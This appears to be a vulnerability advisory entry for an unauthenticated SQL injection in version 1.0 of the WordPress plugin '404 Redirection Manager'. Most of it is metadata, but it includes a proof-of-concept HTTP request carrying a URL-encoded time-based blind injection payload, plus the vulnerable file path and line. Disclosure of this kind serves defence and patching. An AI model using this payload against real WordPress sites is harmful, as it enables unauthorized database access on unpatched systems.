vendor:
404 Redirection Manager
by:
Ahmed Sherif (Deloitte)
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 404 Redirection Manager
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:404_redirection_manager
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Mint
2016
Unauthenticated SQL injeciton in 404 plugin for WordPress v1.0
The plugin does not properly sanitize the user input. Hence, it was vulnerable to SQL injection. The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356. Proof of Concept (PoC): GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp-settings-time-1=1480877693 Connection: close*
Mitigation:
Sanitize user input properly
